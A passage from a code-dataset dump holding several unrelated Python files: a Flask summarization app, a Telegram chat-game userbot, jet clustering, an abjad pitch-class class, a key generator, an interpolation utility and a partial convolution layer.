render_template('bert.html')\n\n\n@app.route('/bert', methods=['POST'])\ndef bert_post():\n    data = request.json\n    ratio = float(data[\"ratio\"])\n    min_length = int(data[\"min_length\"])\n    body = str(data[\"body\"])\n    paragraph = \"\"\n    for line in body.splitlines():\n        line = line.strip()\n        if line != '' and line[-1:] != '.':\n            line = line + '.'\n        paragraph += line.strip()\n\n    result = ''.join(model(\n        paragraph,\n        ratio,\n        min_length=min_length\n    ))\n    result = result.replace('_', ' ')\n    resp = {\n        \"summarized\": result\n    }\n    return jsonify(resp)\n\n\ndef process(para: str):\n    processed = ''\n    for line in para.splitlines():\n        line = line.strip()\n        if line != '':\n            if line[-1] != '.':\n                line = line + '. 
'\n            else:\n                line = line + ' '\n            processed += line\n    return processed.strip()\n","repo_name":"dangnm9699/vietnamese-text-summarization","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5785,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
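The knn_post route above implements centroid-based extractive summarization: embed each sentence, cluster the embeddings with KMeans, keep the sentence closest to each centroid, and re-order the picks by their clusters' average position in the text. A self-contained sketch of that selection step with toy 2-D embeddings (the sentences and vectors are made up for illustration):

import numpy as np
from sklearn.cluster import KMeans
from sklearn.metrics import pairwise_distances_argmin_min

sentences = ["first point.", "nearby point.", "far away point.", "another far one."]
X = np.array([[0.0, 0.1], [0.1, 0.0], [5.0, 5.1], [5.1, 4.9]])  # toy embeddings

n_clusters = 2
kmeans = KMeans(n_clusters=n_clusters, n_init=10).fit(X)

# index of the sentence closest to each centroid
closest, _ = pairwise_distances_argmin_min(kmeans.cluster_centers_, X)

# order the picked sentences by where their clusters sit in the text
avg = [np.mean(np.where(kmeans.labels_ == j)[0]) for j in range(n_clusters)]
ordering = sorted(range(n_clusters), key=lambda k: avg[k])
summary = ' '.join(sentences[closest[idx]] for idx in ordering)
print(summary)  # one representative sentence per cluster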
\n@app.on_message(filters.text & filters.reply)\ndef Duel(client, message):\n    if message.text.lower() == \"дуэль\":\n        Oldmessage = app.get_messages(message.chat.id, reply_to_message_ids = message.message_id)\n        if Oldmessage.from_user.is_self and IsInList(str(message.from_user.id), Customers):\n            try:\n                message.reply_text(\"Реанимировать жабу\", quote = False)\n                sleep(0.1)\n                message.reply_text(\"дуэль принять\", quote=True)\n                sleep(0.2)\n                message.reply_text(\"дуэль старт\", quote = False)\n            except FloodWait as e:\n                sleep(e.x)\n    elif message.text.lower() == \"твой инвентарь\":\n        message.reply_text(\"Мой инвентарь\")\n    elif message.text.lower() == \"твой баланс\":\n        message.reply_text(\"Мой баланс\")\n\ndef IsInList(id, list):\n    IsInCustomer = False\n    for item in list:\n        if id == item:\n            IsInCustomer = True\n    return IsInCustomer\n\ndef saveList(myList, filename):\n    filename += '.json'\n    with open(filename, 'w') as f:\n        # indent=2 is not needed but makes the file more\n        # human-readable for more complicated data\n        json.dump(myList, f, indent=2)\n    print(\"Saved successfully!\")\n\ndef loadList(filename):\n    filename += '.json'\n    with open(filename, 'r') as f:\n        return json.load(f)\n    print(\"Load successfully!\")\n\nCustomers = loadList(\"Customers\")\nAdmins = loadList('Admins')\n\napp.run()\n","repo_name":"devID767/Farm_Duel_Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42062177812","text":"import numpy as np\nimport math\nimport re\nimport os\nimport glob\nimport sys\nimport centauro\nimport subprocess\n\n# =============================================================================\n# Loading event information (particle momenta) ~ (p0,px,py,pz)\n# =============================================================================\n\noutput_folder = \"../output/example_jet_alg/\"\nmkdirCmd = [\"mkdir\", output_folder]\nsubprocess.run(mkdirCmd)\n\n\nR = 0.8\n\nin_file = open(\"../input/single_event_example.txt\",\"r\")\n\nevent = 0\nline = in_file.readline()\nclean_line = np.array(re.sub(' +', ' ', line.strip()).split(\" \"))\nwhile (clean_line[0] == \"\"):\n    event += 1\n    particles = []\n    line = in_file.readline()\n    clean_line = np.array(re.sub(' +', ' ', line.strip()).split(\" \"))\n    while (clean_line[0] != \"\"):\n        aline = clean_line.astype(float)\n        particles.append(aline.tolist())\n        line = in_file.readline()\n        clean_line = np.array(re.sub(' +', ' ', line.strip()).split(\" \"))\n\n    n_particles = len(particles)\n\n    jets = []\n    inclusive_jets = []\n\n    rec = 1\n    for particle in particles:\n        jets.append(centauro.jet([particle], rec, rec))\n\n    inclusive_jets = centauro.centauro_clustering(jets, R)\n\n    i = 0\n    for jet_i in inclusive_jets:\n        out_file = open(output_folder + \"jet_{0}.txt\".format( i ) ,\"w\")\n        for cont_i in jet_i.constituents:\n            vector = [[ centauro.eta(cont_i), centauro.phi(cont_i), centauro.theta(cont_i), cont_i[0] ]]\n            np.savetxt(out_file, vector , delimiter = \"\\t\")\n        i += 1\n        out_file.close()\n\n    line = in_file.readline()\n    clean_line = np.array(re.sub(' +', ' ', line.strip()).split(\" \"))\n\nprint(\"{0} events loaded and analyzed.\".format(event))\n
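\n# --- Editorial note: illustrative sketch, not part of the original script. ---\n# Assuming centauro.eta()/centauro.phi() follow the usual collider conventions\n# for a four-momentum (p0, px, py, pz), they can be spot-checked like this\n# (valid for |pz| strictly below the three-momentum magnitude):\ndef _eta_phi_check(p):\n    p0, px, py, pz = p\n    pmag = math.sqrt(px ** 2 + py ** 2 + pz ** 2)\n    eta = 0.5 * math.log((pmag + pz) / (pmag - pz))  # pseudorapidity\n    phi = math.atan2(py, px)                         # azimuthal angle\n    return eta, phi\n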
\nout_file.close()\n\n","repo_name":"YiannisMakris/centauro","sub_path":"python/example_jet_alg.py","file_name":"example_jet_alg.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30577577896","text":"# -*- coding: utf-8 -*-\nimport numbers\nfrom abjad.tools import mathtools\nfrom abjad.tools.pitchtools.PitchClass import PitchClass\n#Important comment from Greg on line 393\n\nclass NumberedPitchClass(PitchClass):\n '''Numbered pitch-class.\n\n ::\n\n >>> import abjad\n >>> import pytest\n\n .. container:: example\n\n Initializes from number of semitones:\n\n ::\n\n >>> abjad.NumberedPitchClass(13)\n NumberedPitchClass(1)\n\n .. container:: example\n\n Initializes from pitch name.\n\n ::\n\n >>> abjad.NumberedPitchClass('d')\n NumberedPitchClass(2)\n\n .. container:: example\n\n Initializes from named pitch.\n\n ::\n\n >>> abjad.NumberedPitchClass(abjad.NamedPitch('g,'))\n NumberedPitchClass(7)\n\n .. container:: example\n\n Initializes from numbered pitch.\n\n ::\n\n >>> abjad.NumberedPitchClass(abjad.NumberedPitch(15))\n NumberedPitchClass(3)\n\n .. container:: example\n\n Initializes from named pitch-class.\n\n ::\n\n >>> abjad.NumberedPitchClass(abjad.NamedPitchClass('e'))\n NumberedPitchClass(4)\n\n .. container:: example\n\n Initializes from pitch-class / octave string:\n\n ::\n\n >>> abjad.NumberedPitchClass('C#5')\n NumberedPitchClass(1)\n\n .. container:: example\n\n Initializes from other numbered pitch-class:\n\n ::\n\n >>> abjad.NumberedPitchClass(abjad.NumberedPitchClass(9))\n NumberedPitchClass(9)\n\n .. container:: example\n\n Initializes from note:\n\n ::\n\n >>> abjad.NumberedPitchClass(abjad.Note(\"a'8.\"))\n NumberedPitchClass(9)\n\n '''\n\n ### CLASS VARIABLES ###\n\n __slots__ = (\n '_number',\n )\n\n ### INITIALIZER ###\n\n def __init__(self, number=0):\n from abjad.tools import pitchtools\n prototype = (numbers.Number, pitchtools.NumberedPitch, type(self))\n if isinstance(number, numbers.Number):\n self._initialize_by_number(float(number))\n elif isinstance(number, prototype):\n self._initialize_by_number(float(number.number))\n elif isinstance(number, pitchtools.NamedPitch):\n self._initialize_by_named_pitch(number)\n elif isinstance(number, pitchtools.NamedPitchClass):\n self._initialize_by_named_pitch_class(number)\n elif isinstance(number, str):\n self._initialize_by_string(number)\n elif pitchtools.Pitch._is_pitch_carrier(number):\n self._initialize_by_pitch_carrier(number)\n else:\n message = 'can not instantiate {} from {!r}.'\n message = message.format(type(self).__name__, number)\n raise TypeError(message)\n\n ### SPECIAL METHODS ###\n\n def __add__(self, argument):\n r'''Adds `argument` to numbered pitch-class.\n\n .. container:: example\n\n ::\n\n >>> pitch_class = abjad.NumberedPitchClass(9)\n\n ::\n\n >>> pitch_class + abjad.NumberedInterval(0)\n NumberedPitchClass(9)\n\n ::\n\n >>> pitch_class + abjad.NumberedInterval(1)\n NumberedPitchClass(10)\n\n ::\n\n >>> pitch_class + abjad.NumberedInterval(2)\n NumberedPitchClass(11)\n\n ::\n\n >>> pitch_class + abjad.NumberedInterval(3)\n NumberedPitchClass(0)\n\n Returns new numbered pitch-class.\n '''\n from abjad.tools import pitchtools\n interval = pitchtools.NumberedInterval(argument)\n return type(self)(self.number + interval.number % 12)\n\n def __copy__(self, *arguments):\n r'''Copies numbered pitch-class.\n\n .. 
container:: example\n\n ::\n\n >>> import copy\n >>> pitch_class = abjad.NumberedPitchClass(9)\n >>> copy.copy(pitch_class)\n NumberedPitchClass(9)\n\n Returns new numbered pitch-class.\n '''\n return type(self)(self)\n\n def __eq__(self, argument):\n r'''Is true when `argument` is a numbered pitch-class with pitch-class\n number equal to that of this numbered pitch-class.\n\n .. container:: example\n\n ::\n\n >>> pitch_class_1 = abjad.NumberedPitchClass(0)\n >>> pitch_class_2 = abjad.NumberedPitchClass(0)\n >>> pitch_class_3 = abjad.NumberedPitchClass(1)\n\n ::\n\n >>> pitch_class_1 == pitch_class_1\n True\n >>> pitch_class_1 == pitch_class_2\n True\n >>> pitch_class_1 == pitch_class_3\n False\n\n ::\n\n >>> pitch_class_2 == pitch_class_1\n True\n >>> pitch_class_2 == pitch_class_2\n True\n >>> pitch_class_2 == pitch_class_3\n False\n\n ::\n\n >>> pitch_class_3 == pitch_class_1\n False\n >>> pitch_class_3 == pitch_class_2\n False\n >>> pitch_class_3 == pitch_class_3\n True\n\n Returns true or false.\n '''\n return super(NumberedPitchClass, self).__eq__(argument)\n\n def __format__(self, format_specification=''):\n r'''Formats numbered pitch-class.\n\n .. container:: example\n\n ::\n\n >>> format(abjad.NumberedPitchClass(13))\n 'abjad.NumberedPitchClass(1)'\n\n Set `format_specification` to `''`, `'lilypond'` or `'storage'`.\n\n Returns string.\n '''\n superclass = super(NumberedPitchClass, self)\n return superclass.__format__(format_specification=format_specification)\n\n def __hash__(self):\n r'''Hashes numbered pitch-class.\n\n Required to be explicitly redefined on Python 3 if __eq__ changes.\n\n Returns integer.\n '''\n return super(NumberedPitchClass, self).__hash__()\n\n def __lt__(self, argument):\n r'''Is true when `argument` is a numbered pitch-class with a pitch\n number greater than that of this numberd pitch-class.\n\n .. container:: example\n\n Compares less than:\n\n ::\n\n >>> abjad.NumberedPitchClass(1) < abjad.NumberedPitchClass(2)\n True\n\n .. container:: example\n\n Does not compare less than:\n\n ::\n\n >>> abjad.NumberedPitchClass(2) < abjad.NumberedPitchClass(1)\n False\n\n Raises type error when `argument` is not a numbered pitch-class.\n '''\n if not isinstance(argument, type(self)):\n message = 'can not compare numbered pitch-class to {!r}.'\n message = message.format(argument)\n raise TypeError(message)\n return self.number < argument.number\n\n def __neg__(self):\n r'''Negates numbered pitch-class.\n\n .. container:: example\n\n ::\n\n >>> pitch_class = abjad.NumberedPitchClass(9)\n >>> -pitch_class\n NumberedPitchClass(3)\n\n Returns new numbered pitch-class.\n '''\n return type(self)(-self.number)\n\n def __radd__(self, argument):\n r'''Right-addition not defined on numbered pitch-classes.\n\n .. container:: example\n\n ::\n\n >>> statement = '1 + abjad.NumberedPitchClass(9)'\n >>> pytest.raises(NotImplementedError, statement)\n \n\n Raises not implemented error.\n '''\n message = 'right-addition not defined on {}.'\n message = message.format(type(self).__name__)\n raise NotImplementedError(message)\n\n def __str__(self):\n r'''Gets string representation of numbered pitch-class.\n\n Returns string.\n '''\n return str(self.number)\n\n def __sub__(self, argument):\n r'''Subtracts `argument` from numbered pitch-class.\n\n Subtraction is defined against both numbered intervals\n and against other pitch-classes.\n\n .. 
container:: example\n\n ::\n\n >>> abjad.NumberedPitchClass(6) - abjad.NumberedPitchClass(6)\n NumberedInversionEquivalentIntervalClass(0)\n\n ::\n\n >>> abjad.NumberedPitchClass(6) - abjad.NumberedPitchClass(7)\n NumberedInversionEquivalentIntervalClass(1)\n\n ::\n\n >>> abjad.NumberedPitchClass(7) - abjad.NumberedPitchClass(6)\n NumberedInversionEquivalentIntervalClass(1)\n\n .. container:: example\n\n ::\n\n >>> abjad.NumberedPitchClass(6) - abjad.NumberedInterval(-1)\n NumberedPitchClass(5)\n\n ::\n\n >>> abjad.NumberedPitchClass(6) - abjad.NumberedInterval(0)\n NumberedPitchClass(6)\n\n ::\n\n >>> abjad.NumberedPitchClass(6) - abjad.NumberedInterval(1)\n NumberedPitchClass(5)\n\n Returns numbered inversion-equivalent interval-class.\n '''\n from abjad.tools import pitchtools\n if isinstance(argument, type(self)):\n interval_class_number = abs(\n self.number - argument.number\n )\n if 6 < interval_class_number:\n interval_class_number = 12 - interval_class_number\n return pitchtools.NumberedInversionEquivalentIntervalClass(\n interval_class_number)\n interval_class = pitchtools.NumberedInversionEquivalentIntervalClass(\n argument)\n return type(self)(self.number - interval_class.number % 12)\n\n ### PRIVATE METHODS ###\n\n def _apply_accidental(self, accidental=None):\n from abjad.tools import pitchtools\n accidental = pitchtools.Accidental(accidental)\n semitones = self.number + accidental.semitones\n return type(self)(semitones)\n\n def _get_diatonic_pitch_class_name(self):\n return self.name[0]\n\n def _get_diatonic_pitch_class_number(self):\n return self._diatonic_pitch_class_name_to_diatonic_pitch_class_number[\n self._get_diatonic_pitch_class_name()]\n\n def _get_format_specification(self):\n import abjad\n values = [self.number]\n return abjad.FormatSpecification(\n client=self,\n coerce_for_equality=True,\n storage_format_is_indented=False,\n storage_format_args_values=values,\n )\n\n def _initialize_by_named_pitch(self, argument):\n self._number = argument.pitch_class.number\n\n def _initialize_by_named_pitch_class(self, argument):\n self._number = argument.number\n\n#Greg wonders if this need to be changed to avoid rounding up?\n\n#Ivan: Changes below changes will allow 1/8 tones.\n# *will need rewriting to cope with 1/3 and 1/6 tones...\n def _initialize_by_number(self, argument):\n argument = round((float(argument) % 12) * 4) / 4\n div, mod = divmod(argument, 1)\n div %= 12\n self._number = div + mod\n\n def _initialize_by_pitch_carrier(self, argument):\n from abjad.tools import pitchtools\n named_pitch = pitchtools.NamedPitch.from_pitch_carrier(argument)\n self._initialize_by_named_pitch(named_pitch)\n\n def _initialize_by_string(self, argument):\n from abjad.tools import pitchtools\n named_pitch_class = pitchtools.NamedPitchClass(argument)\n self._initialize_by_named_pitch_class(named_pitch_class)\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def accidental(self):\n r'''Gets accidental.\n\n .. container:: example\n\n ::\n\n >>> abjad.NumberedPitchClass(1).accidental\n Accidental('sharp')\n\n Returns accidental.\n '''\n import abjad\n return abjad.NamedPitch(self.number).accidental\n\n @property\n def name(self):\n r'''Gets name of numbered pitch-class.\n\n .. 
container:: example\n\n ::\n\n >>> abjad.NumberedPitchClass(13).name\n 'cs'\n\n Returns string.\n '''\n from abjad import abjad_configuration\n accidental_spelling = abjad_configuration['accidental_spelling']\n if accidental_spelling == 'mixed':\n return self._pitch_class_number_to_pitch_class_name[self.number]\n elif accidental_spelling == 'sharps':\n return self._pitch_class_number_to_pitch_class_name_with_sharps[\n self.number]\n elif accidental_spelling == 'flats':\n return self._pitch_class_number_to_pitch_class_name_with_flats[\n self.number]\n else:\n message = 'unknown accidental spelling: {!r}.'\n message = message.format(accidental_spelling)\n raise ValueError(message)\n\n @property\n def number(self):\n r'''Gets number.\n\n .. container:: example\n\n ::\n\n >>> abjad.NumberedPitchClass(1).number\n 1\n\n .. container:: example\n\n ::\n\n >>> abjad.NumberedPitchClass(13).number\n 1\n\n '''\n return self._number\n\n @property\n def pitch_class_label(self):\n r'''Gets pitch-class / octave label.\n\n .. container:: example\n\n ::\n\n >>> abjad.NumberedPitchClass(13).pitch_class_label\n 'C#'\n\n Returns string.\n '''\n return '{}{}'.format(\n self._get_diatonic_pitch_class_name().upper(),\n self.accidental.symbol,\n )\n\n ### PUBLIC METHODS ###\n\n def invert(self, axis=None):\n r'''Inverts numbered pitch-class.\n\n .. container:: example\n\n ::\n\n >>> for n in range(12):\n ... pitch_class = abjad.NumberedPitchClass(n)\n ... print(repr(pitch_class), repr(pitch_class.invert()))\n ...\n NumberedPitchClass(0) NumberedPitchClass(0)\n NumberedPitchClass(1) NumberedPitchClass(11)\n NumberedPitchClass(2) NumberedPitchClass(10)\n NumberedPitchClass(3) NumberedPitchClass(9)\n NumberedPitchClass(4) NumberedPitchClass(8)\n NumberedPitchClass(5) NumberedPitchClass(7)\n NumberedPitchClass(6) NumberedPitchClass(6)\n NumberedPitchClass(7) NumberedPitchClass(5)\n NumberedPitchClass(8) NumberedPitchClass(4)\n NumberedPitchClass(9) NumberedPitchClass(3)\n NumberedPitchClass(10) NumberedPitchClass(2)\n NumberedPitchClass(11) NumberedPitchClass(1)\n\n Interprets axis of inversion equal to pitch-class 0.\n\n Returns new numbered pitch-class.\n '''\n from abjad.tools import pitchtools\n axis = axis or pitchtools.NumberedPitch('c')\n axis = pitchtools.NumberedPitch(axis)\n this = pitchtools.NumberedPitch(self)\n interval = this - axis\n result = axis.transpose(interval)\n result = type(self)(result)\n return result\n\n def multiply(self, n=1):\n r'''Multiplies pitch-class number by `n`.\n\n .. container:: example\n\n ::\n\n >>> for n in range(12):\n ... pitch_class = abjad.NumberedPitchClass(n)\n ... print(repr(pitch_class), repr(pitch_class.multiply(5)))\n ...\n NumberedPitchClass(0) NumberedPitchClass(0)\n NumberedPitchClass(1) NumberedPitchClass(5)\n NumberedPitchClass(2) NumberedPitchClass(10)\n NumberedPitchClass(3) NumberedPitchClass(3)\n NumberedPitchClass(4) NumberedPitchClass(8)\n NumberedPitchClass(5) NumberedPitchClass(1)\n NumberedPitchClass(6) NumberedPitchClass(6)\n NumberedPitchClass(7) NumberedPitchClass(11)\n NumberedPitchClass(8) NumberedPitchClass(4)\n NumberedPitchClass(9) NumberedPitchClass(9)\n NumberedPitchClass(10) NumberedPitchClass(2)\n NumberedPitchClass(11) NumberedPitchClass(7)\n\n Returns new numbered pitch-class.\n '''\n return type(self)(n * self.number)\n\n def transpose(self, n=0):\n r'''Transposes numbered pitch-class by index `n`.\n\n .. container:: example\n\n ::\n\n >>> for n in range(12):\n ... pitch_class = abjad.NumberedPitchClass(n)\n ... 
print(repr(pitch_class), repr(pitch_class.transpose(-13)))\n            ...\n            NumberedPitchClass(0) NumberedPitchClass(11)\n            NumberedPitchClass(1) NumberedPitchClass(0)\n            NumberedPitchClass(2) NumberedPitchClass(1)\n            NumberedPitchClass(3) NumberedPitchClass(2)\n            NumberedPitchClass(4) NumberedPitchClass(3)\n            NumberedPitchClass(5) NumberedPitchClass(4)\n            NumberedPitchClass(6) NumberedPitchClass(5)\n            NumberedPitchClass(7) NumberedPitchClass(6)\n            NumberedPitchClass(8) NumberedPitchClass(7)\n            NumberedPitchClass(9) NumberedPitchClass(8)\n            NumberedPitchClass(10) NumberedPitchClass(9)\n            NumberedPitchClass(11) NumberedPitchClass(10)\n\n        Returns new numbered pitch-class.\n        '''\n        return type(self)(self.number + n)\n","repo_name":"GregoryREvans/Abjad-Microtones","sub_path":"NumberedPitchClass.py","file_name":"NumberedPitchClass.py","file_ext":"py","file_size_in_byte":17510,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"39788250809","text":"__author__ = 'yo'\nimport string\nimport random\n\nKEY_LEN = 5\nKEY_ALL = 150\n\n\ndef base_str():\n    print(string.ascii_letters + string.digits)\n    return (string.ascii_letters + string.digits)\n\n\ndef key_gen():\n    keylist = [random.choice(base_str()) for i in range(KEY_LEN)]\n    print(keylist)\n    return (\"\".join(keylist))\n\n\ndef key_num(num, result=None):\n    if result is None:\n        result = []\n    for i in range(num):\n        result.append(key_gen())\n    return result\n\n\ndef print_key(num):\n    r = []\n    for i in key_num(num):\n        print(i)\n        r.append(i)\n    return r\n\n\nif __name__ == \"__main__\":\n    # e=print_key(KEY_ALL)\n    s = str(string.ascii_letters + string.digits)\n    print(len(s))\n    # o=[]\n    # for j in e:\n    #     if j not in o:\n    #         o.append(\"CUK\"+j)\n    # print(o)\n    # print(len(o))\n    # with open(\"ckey.txt\", \"a\",encoding=\"utf-8\") as f:\n    #\n    #     for i in o:\n    #         f.write(i+\"\\n\")","repo_name":"shuo502/ipscan","sub_path":"cc.py","file_name":"cc.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4492575203","text":"from matplotlib.figure import \\\n    Figure\nfrom scipy import interpolate as ip\nfrom traits.api import Array, Float, Event, \\\n    ToolbarButton, on_trait_change, \\\n    Property, cached_property, Enum, Instance, Bool\nfrom traitsui.api import View, VGroup, UItem\n# from util.traits.editors import \\\n#     MPLFigureEditor\nfrom view.ui import BMCSLeafNode\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass MFnLineArray(BMCSLeafNode):\n\n    # Public Traits\n    xdata = Array(float, value=[0.0, 1.0])\n\n    def _xdata_default(self):\n        '''\n        convenience default - when xdata not defined created automatically as\n        an array of integers with the same shape as ydata\n        '''\n        return np.arange(self.ydata.shape[0])\n\n    ydata = Array(float, value=[0.0, 1.0])\n\n    def __init__(self, *args, **kw):\n        super(MFnLineArray, self).__init__(*args, **kw)\n        self.replot()\n\n    extrapolate = Enum('constant', 'exception', 'diff', 'zero')\n    '''\n    Vectorized interpolation using scipy.interpolate\n    '''\n\n    def values(self, x, k=1):\n        '''\n        vectorized interpolation, k is the spline order, default set to 1 (linear)\n        '''\n        tck = ip.splrep(self.xdata, self.ydata, s=0, k=k)\n\n        x = np.array([x]).flatten()\n\n        if self.extrapolate == 'diff':\n            values = ip.splev(x, tck, der=0)\n        elif self.extrapolate == 'exception':\n            if np.all(x >= self.xdata[0]) and np.all(x <= self.xdata[-1]):\n                values = ip.splev(x, tck, der=0)\n            else:\n                raise ValueError('value(s) outside interpolation range')\n        elif self.extrapolate == 'constant':\n            values = ip.splev(x, tck, der=0)\n            values[x < self.xdata[0]] = self.ydata[0]\n            values[x > self.xdata[-1]] = self.ydata[-1]\n        elif self.extrapolate == 'zero':\n            values = ip.splev(x, tck, der=0)\n            values[x < self.xdata[0]] = 0.0\n            values[x > self.xdata[-1]] = 0.0\n        return values\n
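\n    # --- Editorial note: illustrative usage, not part of the original class. ---\n    # How the four extrapolate modes differ outside the data range, e.g. for\n    # mf = MFnLineArray(xdata=[0.0, 1.0], ydata=[0.0, 2.0]):\n    #     'constant'  -> clamps to ydata[0] / ydata[-1]\n    #     'zero'      -> returns 0.0 outside [0, 1]\n    #     'diff'      -> continues the spline trend past the ends\n    #     'exception' -> raises ValueError for out-of-range points\n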
\n    def __call__(self, x):\n        return self.values(x)\n\n    yrange = Property\n    '''Get min max values on the vertical axis\n    '''\n\n    def _get_yrange(self):\n        return np.min(self.ydata), np.max(self.ydata)\n\n    xrange = Property\n    '''Get min max values on the horizontal axis\n    '''\n\n    def _get_xrange(self):\n        return np.min(self.xdata), np.max(self.xdata)\n\n    data_changed = Event\n\n    figure = Instance(Figure)\n\n    def _figure_default(self):\n        figure = Figure(facecolor='white')\n        return figure\n\n    def diff(self, x, k=1, der=1):\n        '''\n        vectorized interpolation, der is the nth derivative, default set to 1;\n        k is the spline order of the data interpolation, default set to 1 (linear)\n        '''\n        xdata = np.sort(np.hstack((self.xdata, x)))\n        idx = np.argwhere(np.diff(xdata) == 0).flatten()\n        xdata = np.delete(xdata, idx)\n        tck = ip.splrep(xdata, self.values(xdata, k=k), s=0, k=k)\n        return ip.splev(x, tck, der=der)\n\n    dump_button = ToolbarButton('Print data',\n                                style='toolbar')\n\n    @on_trait_change('dump_button')\n    def print_data(self, event=None):\n        print('x = ', repr(self.xdata))\n        print('y = ', repr(self.ydata))\n\n    integ = Property(Float(), depends_on='ydata')\n\n    @cached_property\n    def _get_integ(self):\n        _xdata = self.xdata\n        _ydata = self.ydata\n        # integral under the stress strain curve\n        return np.trapz(_ydata, _xdata)\n\n    def clear(self):\n        self.xdata = np.array([])\n        self.ydata = np.array([])\n\n    def plot(self, axes, *args, **kw):\n        self.mpl_plot(axes, *args, **kw)\n\n    def mpl_plot(self, axes, *args, **kw):\n        '''plot within matplotlib window'''\n        axes.plot(self.xdata, self.ydata, *args, **kw)\n\n    def mpl_plot_diff(self, axes, *args, **kw):\n        '''plot within matplotlib window'''\n        ax_dx = axes.twinx()\n        x = np.linspace(self.xdata[0], self.xdata[-1],\n                        np.size(self.xdata) * 20)\n        y_dx = self.diff(x, k=1, der=1)\n        ax_dx.plot(x, y_dx, *args + ('-',), **kw)\n\n    plot_diff = Bool(False)\n\n    def replot(self):\n        self.figure.clf()\n        ax = self.figure.add_subplot(111)\n        self.mpl_plot(ax)\n        if self.plot_diff:\n            self.mpl_plot_diff(ax, color='orange')\n        self.data_changed = True\n\n    def savefig(self, fname):\n        fig = plt.figure()\n        ax = fig.add_subplot(111)\n        self.mpl_plot(ax)\n        self.mpl_plot_diff(ax, color='orange')\n        fig.savefig(fname)\n\n    tree_view = View(\n        VGroup(\n            VGroup(\n                # UItem('figure', editor=MPLFigureEditor(),\n                #       resizable=True,\n                #       springy=True),\n                # scrollable=True,\n            ),\n        )\n    )\n\n    traits_view = tree_view\n\n\nif __name__ == '__main__':\n    import pylab as plt\n\n#     from matplotlib import pyplot as plt\n    x = np.linspace(-2, 7, 20)\n    xx = np.linspace(-4, 8, 100)\n    y = np.sin(x)\n\n    mf = MFnLineArray(xdata=x, ydata=y)\n\n    # plots raw data\n    def data():\n        plt.plot(x, y, 'ro', label='data')\n\n    # plots values with extrapolation as constant value\n    def constant():\n        mf.extrapolate = 'constant'\n        plt.plot(xx, mf(xx), label='constant')\n        plt.plot(xx, mf.diff(xx), label='constant diff')\n\n    # plots values with extrapolation as zero\n    def zero():\n        mf.extrapolate = 'zero'\n        plt.plot(xx, mf(xx), label='zero')\n        plt.plot(xx, mf.diff(xx), label='zero diff')\n\n    # plots values with extrapolation with constant slope\n    def diff():\n        mf.extrapolate = 'diff'\n        plt.plot(xx, 
mf(xx), label='diff')\n plt.plot(xx, mf.diff(xx,), label='diff diff')\n\n # raises an exception if data are outside the interpolation range\n def exception():\n mf.extrapolate = 'exception'\n plt.plot(xx, mf(xx), label='exception')\n\n data()\n # constant()\n # zero()\n diff()\n # exception()\n plt.legend(loc='best')\n plt.show()\n\n mf.replot()\n mf.configure_traits()\n","repo_name":"simvisage/bmcs","sub_path":"mathkit/mfn/mfn_line/mfn_line.py","file_name":"mfn_line.py","file_ext":"py","file_size_in_byte":6200,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"35262659438","text":"from arquivos_obi import read_OBI_files\n\nfor input, sol, file_input, file_output in read_OBI_files(\"\\escher\"):\n tamanho = int(input[0])\n sequencia = input[1].split(\" \")\n sequencia = [int(x) for x in sequencia]\n\n gabarito = sol[0]\n\n saida = None\n sequencia_reversa = sequencia.copy()\n sequencia_reversa.reverse()\n\n numero_escher = sequencia[0] + sequencia_reversa[0]\n for i, j in zip(sequencia, sequencia_reversa):\n if (i + j) != numero_escher:\n saida = \"N\"\n break\n else:\n saida = \"S\"\n\n if saida != gabarito:\n print(\"Erro para\", sequencia)\n print(\"Saida gerada:\", saida)\n print(\"Gabarito:\", gabarito)\n print(file_input, file_output)\n","repo_name":"lucaslattari/OBI-2020-Junior-Fase-1","sub_path":"escher_arquivo.py","file_name":"escher_arquivo.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"30059973474","text":"import numpy as np\nfrom nndl.layers import *\nimport pdb\n\n\"\"\" \nThis code was originally written for CS 231n at Stanford University\n(cs231n.stanford.edu). It has been modified in various areas for use in the\nECE 239AS class at UCLA. This includes the descriptions of what code to\nimplement as well as some slight potential changes in variable names to be\nconsistent with class nomenclature. We thank Justin Johnson & Serena Yeung for\npermission to use this code. To see the original version, please visit\ncs231n.stanford.edu. \n\"\"\"\n\ndef conv_forward_naive(x, w, b, conv_param):\n \"\"\"\n A naive implementation of the forward pass for a convolutional layer.\n\n The input consists of N data points, each with C channels, height H and width\n W. 
We convolve each input with F different filters, where each filter spans\n    all C channels and has height HH and width WW.\n\n    Input:\n    - x: Input data of shape (N, C, H, W)\n    - w: Filter weights of shape (F, C, HH, WW)\n    - b: Biases, of shape (F,)\n    - conv_param: A dictionary with the following keys:\n      - 'stride': The number of pixels between adjacent receptive fields in the\n        horizontal and vertical directions.\n      - 'pad': The number of pixels that will be used to zero-pad the input.\n\n    Returns a tuple of:\n    - out: Output data, of shape (N, F, H', W') where H' and W' are given by\n      H' = 1 + (H + 2 * pad - HH) / stride\n      W' = 1 + (W + 2 * pad - WW) / stride\n    - cache: (x, w, b, conv_param)\n    \"\"\"\n    out = None\n    pad = conv_param['pad']\n    stride = conv_param['stride']\n\n    # ================================================================ #\n    # YOUR CODE HERE:\n    #   Implement the forward pass of a convolutional neural network.\n    #   Store the output as 'out'.\n    #   Hint: to pad the array, you can use the function np.pad.\n    # ================================================================ #\n\n    N, C, H, W = x.shape  # [N, 3, 32, 32]\n    F, C, HH, WW = w.shape  # [32, 3, 7, 7]\n\n    padded_x = np.pad(x, ((0, 0), (0, 0), (pad, pad), (pad, pad)), 'constant')  # [N, 3, 